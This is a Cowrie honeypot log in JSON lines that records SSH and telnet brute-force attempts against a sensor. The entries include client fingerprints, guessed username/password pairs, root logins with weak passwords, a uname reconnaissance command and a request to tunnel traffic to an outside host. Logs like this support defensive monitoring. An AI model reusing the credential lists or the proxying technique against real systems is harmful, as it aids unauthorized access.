{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:41:56.621010Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T09:41:56.830254Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:41:57.460620Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:41:57.894754Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:41:57.895469Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:58.107042Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:41:58.108177Z","src_ip":"212.227.235.229","session":"22a73a728571"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":57098,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a4837242e0a","protocol":"ssh","message":"New connection: 193.32.162.145:57098 (1.2.3.4:22) [session: 2a4837242e0a]","sensor":"my-vps","timestamp":"2025-08-28T09:42:01.190535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:01.191279Z","src_ip":"193.32.162.145","session":"2a4837242e0a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:42:01.222735Z","src_ip":"193.32.162.145","session":"2a4837242e0a"}
{"eventid":"cowrie.login.failed","username":"geyser","password":"geyser","message":"login attempt [geyser/geyser] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:01.314086Z","src_ip":"193.32.162.145","session":"2a4837242e0a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:02.346995Z","src_ip":"193.32.162.145","session":"2a4837242e0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41760,"dst_ip":"1.2.3.4","dst_port":23,"session":"27a4ca74d836","protocol":"telnet","message":"New connection: 212.227.125.160:41760 (1.2.3.4:23) [session: 27a4ca74d836]","sensor":"my-vps","timestamp":"2025-08-28T09:42:02.903499Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4302c76aff4f","protocol":"ssh","message":"New connection: 51.79.164.132:52586 (1.2.3.4:22) [session: 4302c76aff4f]","sensor":"my-vps","timestamp":"2025-08-28T09:42:09.441781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:09.615497Z","src_ip":"51.79.164.132","session":"4302c76aff4f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:42:10.124118Z","src_ip":"51.79.164.132","session":"4302c76aff4f"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47790,"dst_ip":"1.2.3.4","dst_port":22,"session":"510b8e197618","protocol":"ssh","message":"New connection: 185.93.89.7:47790 (1.2.3.4:22) [session: 510b8e197618]","sensor":"my-vps","timestamp":"2025-08-28T09:42:10.268575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:10.271532Z","src_ip":"185.93.89.7","session":"510b8e197618"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:42:10.286541Z","src_ip":"185.93.89.7","session":"510b8e197618"}
{"eventid":"cowrie.login.failed","username":"index","password":"q1w2e3","message":"login attempt [index/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:10.341099Z","src_ip":"185.93.89.7","session":"510b8e197618"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:11.364057Z","src_ip":"185.93.89.7","session":"510b8e197618"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:11.842206Z","src_ip":"51.79.164.132","session":"4302c76aff4f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.192020Z","src_ip":"51.79.164.132","session":"4302c76aff4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60193,"dst_ip":"1.2.3.4","dst_port":23,"session":"160487ea0786","protocol":"telnet","message":"New connection: 212.227.125.160:60193 (1.2.3.4:23) [session: 160487ea0786]","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.477319Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9101,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f3370ae607b","protocol":"ssh","message":"New connection: 212.227.235.229:9101 (1.2.3.4:22) [session: 5f3370ae607b]","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.659280Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.660533Z","src_ip":"212.227.235.229","session":"5f3370ae607b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9431,"dst_ip":"1.2.3.4","dst_port":22,"session":"c95a7ee0e00c","protocol":"ssh","message":"New connection: 212.227.235.229:9431 (1.2.3.4:22) [session: c95a7ee0e00c]","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.835980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.836715Z","src_ip":"212.227.235.229","session":"c95a7ee0e00c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T09:42:13.994208Z","src_ip":"212.227.235.229","session":"c95a7ee0e00c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:42:14.469008Z","src_ip":"212.227.235.229","session":"c95a7ee0e00c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T09:42:14.627587Z","session":"c95a7ee0e00c"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":55776,"dst_ip":"1.2.3.4","dst_port":23,"session":"f718db336159","protocol":"telnet","message":"New connection: 123.31.39.100:55776 (1.2.3.4:23) [session: f718db336159]","sensor":"my-vps","timestamp":"2025-08-28T09:42:15.454228Z"}
{"eventid":"cowrie.session.closed","duration":13.09346604347229,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:15.996899Z","src_ip":"212.227.125.160","session":"27a4ca74d836"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49572,"dst_ip":"1.2.3.4","dst_port":22,"session":"907f60880400","protocol":"ssh","message":"New connection: 185.93.89.7:49572 (1.2.3.4:22) [session: 907f60880400]","sensor":"my-vps","timestamp":"2025-08-28T09:42:33.889078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:33.966645Z","src_ip":"185.93.89.7","session":"907f60880400"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:42:33.967363Z","src_ip":"185.93.89.7","session":"907f60880400"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdfghjk","message":"login attempt [index/asdfghjk] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:34.046536Z","src_ip":"185.93.89.7","session":"907f60880400"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:35.067622Z","src_ip":"185.93.89.7","session":"907f60880400"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36242,"dst_ip":"1.2.3.4","dst_port":22,"session":"4344d91f5c93","protocol":"ssh","message":"New connection: 51.79.164.132:36242 (1.2.3.4:22) [session: 4344d91f5c93]","sensor":"my-vps","timestamp":"2025-08-28T09:42:36.146289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:36.423296Z","src_ip":"51.79.164.132","session":"4344d91f5c93"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:42:36.423980Z","src_ip":"51.79.164.132","session":"4344d91f5c93"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:39.840148Z","src_ip":"51.79.164.132","session":"4344d91f5c93"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:42:41.180542Z","src_ip":"51.79.164.132","session":"4344d91f5c93"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57822,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb412892214d","protocol":"ssh","message":"New connection: 185.93.89.7:57822 (1.2.3.4:22) [session: eb412892214d]","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.129157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.130427Z","src_ip":"185.93.89.7","session":"eb412892214d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.147075Z","src_ip":"185.93.89.7","session":"eb412892214d"}
{"eventid":"cowrie.login.failed","username":"index","password":"Password","message":"login attempt [index/Password] failed","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.200895Z","src_ip":"185.93.89.7","session":"eb412892214d"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":4022,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfb9bdd2aaef","protocol":"ssh","message":"New connection: 186.225.142.90:4022 (1.2.3.4:22) [session: dfb9bdd2aaef]","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.443253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.580717Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:42:58.866319Z","src_ip":"186.225.142.90","session":"dfb9bdd2aaef"}
